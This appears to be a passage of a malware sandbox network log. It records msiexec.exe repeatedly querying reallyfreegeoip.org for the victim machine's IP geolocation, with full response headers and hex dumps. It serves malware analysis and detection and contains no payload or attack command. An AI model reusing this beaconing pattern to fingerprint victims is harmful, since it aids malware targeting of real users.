                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YpwgdYAO8IaOjhIGeIeO44gMU1h0p1G8hcPsyTjHYLRKaE3%2FfO9LPp0N83dH57jBPnqN%2BqQ3cnU3OUpvA9BiIRg0nznkbfixA%2FWB1v2tKpb8ssOv00HD9QAszrdoEGw%2F6ebQrdWe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f30647daf9b199d-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1818&rtt_var=688&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1606160&cwnd=223&unsent_bytes=0&cid=d33c80c8f18048f4&ts=469&x=0"
                                                                                                                                                                                  2024-12-16 17:28:54 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  3192.168.2.449740104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:28:56 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-12-16 17:28:56 UTC886INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:56 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358905
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vedteoUKHuSwjG3%2F2ZPg09pvFKHW%2B2S%2BIU0TmkWHNtR5%2B%2B77YrYIxZpgjOb%2BoATkhRob2G9LDx6KM8aXtDKrN7X2BtcM7pucpXJ8IVCnPQQBZ1PBhUGgFUu%2F%2F2pghYKueKm5WvT4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f30648acbc5728a-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1846&min_rtt=1840&rtt_var=694&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1586956&cwnd=227&unsent_bytes=0&cid=78d043de7cf9934a&ts=510&x=0"
                                                                                                                                                                                  2024-12-16 17:28:56 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  4192.168.2.449744104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:28:59 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:00 UTC880INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:28:59 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358908
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=12grzhg%2BPAuA96hOnCByMNLOpBG%2F2%2FAdFlKUi02xrvp1IZx62guETNkkHlEj%2BjqNYeUlvMXMhZu2Xo1kFqmaOLAyhDYJFDJnge4%2FXOLNx4ZmUcf5N3J8PwEqrQXfI5KVMWSn0BYq"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f30649e3a821879-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1681&rtt_var=650&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1658148&cwnd=162&unsent_bytes=0&cid=a09f3ae604f6d0d2&ts=459&x=0"
                                                                                                                                                                                  2024-12-16 17:29:00 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  5192.168.2.449756104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:03 UTC878INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:03 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358912
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N0BZb7nhZDFqbpFOxHcP7cknsixB8HV%2BL%2BNpPIlm2aJNOVtmnF9WvJXzP0kKbRzJ664dAhIK9hSzIhEKrdxLtU2WKmO1iF2Cu6gM0zXekeM1UgOgc8%2FCMWxckAUeiBR%2BaJm5Bhkd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f3064b598b91895-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1548&min_rtt=1506&rtt_var=594&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1938911&cwnd=185&unsent_bytes=0&cid=f60fa39cb6530410&ts=492&x=0"
                                                                                                                                                                                  2024-12-16 17:29:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  6192.168.2.449765104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:06 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:07 UTC873INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:06 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358915
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMflAgBK5WLbNKB4s6m7NtaQhGmxOKGzj8XOrmESD605vFNingEbTkSNsDaHCxgCcRmPSTKRha9SXOOu%2BOUjPqNeL7K9m9Hw8d9QKp9faeYsSgvlkhpjKIz%2FL8fkiJVcLoiFi4xD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f3064ca4d3a4285-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2074&rtt_var=789&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1377358&cwnd=32&unsent_bytes=0&cid=e432ecc6fc76dc0a&ts=461&x=0"
                                                                                                                                                                                  2024-12-16 17:29:07 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  7192.168.2.449774104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:09 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:10 UTC884INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:09 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358918
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pHutBL6vVWmtm7%2BKy06oFXu5CzM7XGYa6vio2slT9zx96OafJoqJC3RyleTTcAWRVlF4qCUGkN7iaPtT%2BjKahfwiTk90ofOMgYcryEVKWT8jt2a%2Fy0sp%2B%2BiQPrK4%2FaIjPv%2FjAjlR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f3064dd4f995e76-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1593&rtt_var=610&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1773997&cwnd=209&unsent_bytes=0&cid=faad9e1842dd164c&ts=463&x=0"
                                                                                                                                                                                  2024-12-16 17:29:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  8192.168.2.449781104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:12 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  2024-12-16 17:29:13 UTC876INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:13 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358922
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YqTNPtvq7CN2ci2xpoP6Pky8IaC9M4VFf8ghtjrMu7ThHrTO9Q44QM%2F698VS1rhwF4W%2FrD%2FTSiw7NzHZompby85rGEFqld7ZPSnsSZoctUeYW0PiQA4jAaZ8RY3efJ8aTLkUACF2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f3064f02ea34282-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1616&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1684939&cwnd=252&unsent_bytes=0&cid=65632a1305f2602a&ts=474&x=0"
                                                                                                                                                                                  2024-12-16 17:29:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  9192.168.2.449792104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:15 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:16 UTC874INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:16 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358925
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oGh0fSy95ob3gr4TQ%2F8GT24loQF583FwIrlhr3L3tGI9iua3m3uzOz7f0JMnXbVQxArdCPUOGvTNuGabo0ADstJFrx8SKVTCWkSPLKFRfuCNC2zjwOMXvx%2B58xP0jZyrvM0sGER6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f3065047de0c3fa-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1696&min_rtt=1552&rtt_var=870&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1079881&cwnd=186&unsent_bytes=0&cid=ab05547a35041ed5&ts=708&x=0"
                                                                                                                                                                                  2024-12-16 17:29:16 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  10192.168.2.449800104.21.67.1524438012C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-16 17:29:18 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-16 17:29:19 UTC872INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Mon, 16 Dec 2024 17:29:19 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 358928
                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gA6o6p1FmlU8ANwu3fCCa41d1A0Ab87TzLYKDvHuXWPkLMbIlFzKJqrwNeEhIhuYERFZOEKRjD89wOCrBNzJT3W70DliR7q5oYLnf591X8hhz6Cl1uZxXkzgl%2BlEVZUUiZRDmMtv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8f3065176b130f64-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1493&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1899804&cwnd=233&unsent_bytes=0&cid=3cc0a6c69936cb0c&ts=481&x=0"
